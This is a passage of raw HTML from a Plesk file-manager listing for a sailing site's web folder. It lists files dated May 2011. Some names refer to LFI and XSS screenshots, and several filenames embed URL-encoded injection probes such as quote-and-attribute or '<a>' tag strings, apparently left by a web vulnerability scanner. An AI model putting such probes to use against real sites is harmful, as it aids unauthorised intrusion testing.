03:10 PM</td><td><A href="http://nosedivesailing.com/064a7066601" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=064a7066601" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F064a7066601" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=064a7066601" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_1-lfi-mod.JPG" value="1-lfi-mod.JPG" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=1-lfi-mod.JPG" onClick=";lon();" onMouseOver="f(event, &#039;image&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_image.gif" width="16" height="16" alt="file_image.gif" 
title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=1-lfi-mod.JPG" onClick=";lon();">1-lfi-mod.JPG</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 02:35 PM</td><td><A href="http://nosedivesailing.com/1-lfi-mod.JPG" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=1-lfi-mod.JPG" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F1-lfi-mod.JPG" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=1-lfi-mod.JPG" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_1-lfi-mod.JPGfdf080d99066333a3eca3950" value="1-lfi-mod.JPGfdf080d99066333a3eca3950" onClick="FileListSelectOnChange(this);"></td><td 
class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=1-lfi-mod.JPGfdf080d99066333a3eca3950" onClick="return bin();;lon();">1-lfi-mod.JPGfdf080d99066333a3eca3950</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 02:35 PM</td><td><A href="http://nosedivesailing.com/1-lfi-mod.JPGfdf080d99066333a3eca3950" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=1-lfi-mod.JPGfdf080d99066333a3eca3950" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F1-lfi-mod.JPGfdf080d99066333a3eca3950" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=1-lfi-mod.JPGfdf080d99066333a3eca3950" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" 
onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_1dac1%2522a%253d%2522b%2522064a7066601" value="1dac1%2522a%253d%2522b%2522064a7066601" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=1dac1%252522a%25253d%252522b%252522064a7066601" onClick="return bin();;lon();">1dac1%2522a%253d%2522b%2522064a7066601</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/1dac1%2522a%253d%2522b%2522064a7066601" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=1dac1%252522a%25253d%252522b%252522064a7066601" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F1dac1%252522a%25253d%252522b%252522064a7066601" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A 
href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=1dac1%252522a%25253d%252522b%252522064a7066601" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_25e31e30568" value="25e31e30568" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=25e31e30568" onClick="return bin();;lon();">25e31e30568</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:09 PM</td><td><A href="http://nosedivesailing.com/25e31e30568" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=25e31e30568" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A 
href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F25e31e30568" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=25e31e30568" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_2a790%253ca%253e05dd7ec7ca9" value="2a790%253ca%253e05dd7ec7ca9" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=2a790%25253ca%25253e05dd7ec7ca9" onClick="return bin();;lon();">2a790%253ca%253e05dd7ec7ca9</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/2a790%253ca%253e05dd7ec7ca9" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A 
href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=2a790%25253ca%25253e05dd7ec7ca9" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F2a790%25253ca%25253e05dd7ec7ca9" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=2a790%25253ca%25253e05dd7ec7ca9" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_2ef80%2522%2520a%253db%2520c23f52e7ba1" value="2ef80%2522%2520a%253db%2520c23f52e7ba1" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=2ef80%252522%252520a%25253db%252520c23f52e7ba1" onClick="return 
bin();;lon();">2ef80%2522%2520a%253db%2520c23f52e7ba1</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:09 PM</td><td><A href="http://nosedivesailing.com/2ef80%2522%2520a%253db%2520c23f52e7ba1" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=2ef80%252522%252520a%25253db%252520c23f52e7ba1" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F2ef80%252522%252520a%25253db%252520c23f52e7ba1" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=2ef80%252522%252520a%25253db%252520c23f52e7ba1" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_302br.net-xss-2.jpg" value="302br.net-xss-2.jpg" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A 
href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=302br.net-xss-2.jpg" onClick=";lon();" onMouseOver="f(event, &#039;image&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_image.gif" width="16" height="16" alt="file_image.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=302br.net-xss-2.jpg" onClick=";lon();">302br.net-xss-2.jpg</a></td><td class="number">65.0&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/302br.net-xss-2.jpg" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=302br.net-xss-2.jpg" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F302br.net-xss-2.jpg" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=302br.net-xss-2.jpg" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = 
this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" value="302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onClick="return bin();;lon();">302br.net-xss-2.jpgfdf080d93392bd957db5b4d5</a></td><td class="number">65.0&nbsp;KB</td><td class="number">May 23, 2011 02:35 PM</td><td><A href="http://nosedivesailing.com/302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A 
href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_3e50b%2522%253e%253ca%253e8f0ee00628" value="3e50b%2522%253e%253ca%253e8f0ee00628" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=3e50b%252522%25253e%25253ca%25253e8f0ee00628" onClick="return bin();;lon();">3e50b%2522%253e%253ca%253e8f0ee00628</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:09 PM</td><td><A href="http://nosedivesailing.com/3e50b%2522%253e%253ca%253e8f0ee00628" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=3e50b%252522%25253e%25253ca%25253e8f0ee00628" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" 
alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F3e50b%252522%25253e%25253ca%25253e8f0ee00628" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=3e50b%252522%25253e%25253ca%25253e8f0ee00628" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_3M.COM-XSS-1.JPG" value="3M.COM-XSS-1.JPG" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=3M.COM-XSS-1.JPG" onClick=";lon();" onMouseOver="f(event, &#039;image&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_image.gif" width="16" height="16" alt="file_image.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=3M.COM-XSS-1.JPG" onClick=";lon();">3M.COM-XSS-1.JPG</a></td><td class="number">279&nbsp;KB</td><td class="number">May 23, 2011 02:35 PM</td><td><A href="http://nosedivesailing.com/3M.COM-XSS-1.JPG" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" 
alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=3M.COM-XSS-1.JPG" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F3M.COM-XSS-1.JPG" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=3M.COM-XSS-1.JPG" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_3M.COM-XSS-1.JPGfdf080d921773c427dce8684" value="3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onClick="return 
bin();;lon();">3M.COM-XSS-1.JPGfdf080d921773c427dce8684</a></td><td class="number">279&nbsp;KB</td><td class="number">May 23, 2011 02:35 PM</td><td><A href="http://nosedivesailing.com/3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_673db%2522a%253d%2522b%25226c91d8a7d6d" value="673db%2522a%253d%2522b%25226c91d8a7d6d" 
onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=673db%252522a%25253d%252522b%2525226c91d8a7d6d" onClick="return bin();;lon();">673db%2522a%253d%2522b%25226c91d8a7d6d</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/673db%2522a%253d%2522b%25226c91d8a7d6d" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=673db%252522a%25253d%252522b%2525226c91d8a7d6d" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F673db%252522a%25253d%252522b%2525226c91d8a7d6d" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=673db%252522a%25253d%252522b%2525226c91d8a7d6d" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, 
